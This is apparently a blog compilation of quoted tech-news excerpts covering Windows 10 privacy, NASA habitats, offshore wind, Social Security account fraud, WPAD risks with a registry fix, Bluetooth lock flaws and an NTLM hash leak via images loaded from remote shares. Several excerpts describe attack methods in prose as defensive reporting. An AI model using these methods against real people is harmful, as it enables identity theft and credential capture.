The tactics Microsoft employed to get users of earlier versions of Windows to upgrade to Windows 10 went from annoying to downright malicious. Some highlights: Microsoft installed an app in users’ system trays advertising the free upgrade to Windows 10. The app couldn’t be easily hidden or removed, but some enterprising users figured out a way. Then, the company kept changing the app and bundling it into various security patches, creating a cat-and-mouse game to uninstall it.
Source: With Windows 10, Microsoft Blatantly Disregards User Choice and Privacy: A Deep Dive | Electronic Frontier Foundation
And while users can disable some of these settings, it is not a guarantee that your computer will stop talking to Microsoft’s servers. A significant issue is the telemetry data the company receives. While Microsoft insists that it aggregates and anonymizes this data, it hasn’t explained just how it does so.
The Ixion Team is a new addition to NASA’s NextSTEP effort, and will begin by conducting a comprehensive feasibility study evaluating the conversion of rocket upper stages into habitats. This innovative approach offers a pathway that is more affordable and involves less risk than fabricating modules on the ground and subsequently launching them into orbit.
Source: NanoRacks To Catalyze Concepts for Deep Space Habitats
GE and Deepwater Wind, a developer of offshore turbines, are installing five massive wind turbines in the middle of the Atlantic Ocean. They will make up the first offshore wind farm in North America, called the Block Island Wind Farm.
Over the past several weeks, the teams have worked to install the turbines 30 miles off the coast of Rhode Island, and are expected to finish by the end of August 2016. The farm will be fully operational by November 2016.
Source: GE is building America’s first offshore wind farm with turbines twice as tall as the Statue of Liberty
Sadly, it is still relatively easy for thieves to create an account in the name of Americans who have not already created one for themselves. All one would need is the target’s name, date of birth, Social Security number, residential address, and phone number. This personal data can be bought for roughly $3-$4 from a variety of cybercrime shops online.
After that, the SSA relays four multiple-guess, so-called “knowledge-based authentication” or KBA questions from credit bureau Equifax. In practice, many of these KBA questions — such as previous address, loan amounts and dates — can be successfully enumerated with random guessing. What’s more, very often the answers to these questions can be found by consulting free online services, such as Zillow and Facebook.
Source: Social Security Administration Now Requires Two-Factor Authentication — Krebs on Security
The location of PAC files can be discovered through WPAD in several ways: through a special Dynamic Host Configuration Protocol (DHCP) option, through local Domain Name System (DNS) lookups, or through Link-Local Multicast Name Resolution (LLMNR).
Source: Disable WPAD now or have your accounts and private data compromised | CSO Online
The researchers recommended computer users disable the protocol. “No seriously, turn off WPAD!” one of their presentation slides said. “If you still need to use PAC files, turn off WPAD and configure an explicit URL for your PAC script; and serve it over HTTPS or from a local file.”
From Slashdot comments:
To prevent Windows from tracking which network support WPAD, you need to make a simple registry change:
Click the Start button, and in the search field, type in “regedit”, then select “regedit.exe” from the list of results
Navigate through the tree to “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad”
Once you have the “Wpad” folder selected, right click in the right pane, and click on “New -> DWORD (32-Bit Value)”
Name this new value “WpadOverride”
Double click the new “WpadOverride” value to edit it
In the “Value data” field, replace the “0” with a “1”, then click “OK”
Reboot the computer
While Rightscorp was expected to make the most of BMG’s victory in its future dealings with ISPs, the level of aggression in its announcement still comes as a surprise. Essentially putting every provider in the country on notice, Rightscorp warns that ISPs will now have to cooperate or face the wrath of litigious rightsholders.
Source: Rightscorp Threatens Every ISP in the United States – TorrentFreak
Whether this week’s developments will help to pull Rightscorp out of the financial doldrums will remain to be seen. The company has been teetering on the edge of bankruptcy for a couple of years now, and its shares on Wednesday were worth just $0.038 each. Following the BMG news, they peaked at $0.044.
“5G” is a marketing term. There is no 5G standard — yet. The International Telecommunications Union plans to have standards ready by 2020. So for the moment “5G” refers to a handful of different kinds of technologies that are predicted, but not guaranteed, to emerge at some point in the next 3 to 7 years. (3GPP, a carrier consortium that will be contributing to the ITU process, said last year that until an actual standard exists, “’5G’ will remain a marketing & industry term that companies will use as they
Source: The Next Generation of Wireless — “5G” — Is All Hype. — Backchannel
An image kernel is a small matrix used to apply effects like the ones you might find in Photoshop or Gimp, such as blurring, sharpening, outlining or embossing. They’re also used in machine learning for ‘feature extraction’, a technique for determining the most important portions of an image. In this context the process is referred to more generally as “convolution” (see: convolutional neural networks.)
Source: Image Kernels explained visually
Twelve out of 16 Bluetooth smart locks examined could be unlocked by a remote attacker, a researcher said at the DEF CON hacker conference.
Source: 75 Percent of Bluetooth Smart Locks Can Be Hacked
The problems didn’t lie with the Bluetooth Low Energy protocol itself, Rose said, but in the way the locks implemented Bluetooth communications, or with a lock’s companion smartphone app. Four locks, for example, transmitted their user passwords in plaintext to smartphones, making it easy for anyone with a $100 Bluetooth sniffer to pluck the passwords out of thin air.
Basically, the default User Authentification Settings of Edge/Spartan (also Internet Explorer, Outlook) lets the browser connect to local network shares, but erroneously fail to block connections to remote shares. To exploit this, an attacker would simply set up a network share. An embedded image link that points to that network share is then sent to the victim, for example as part of an email or website. As soon as the prepped content is viewed inside a Microsoft product such as Edge/Spartan, Internet Explorer or Outlook, that software will try to connect to that share in order to download the image. Doing so, it will silently send the user’s Windows login username in plaintext along with the NTLMv2 hash of the login password to the attacker’s network share.
Source: Microsoft Live Account Credentials Leaking From Windows 8 And Above | Hackaday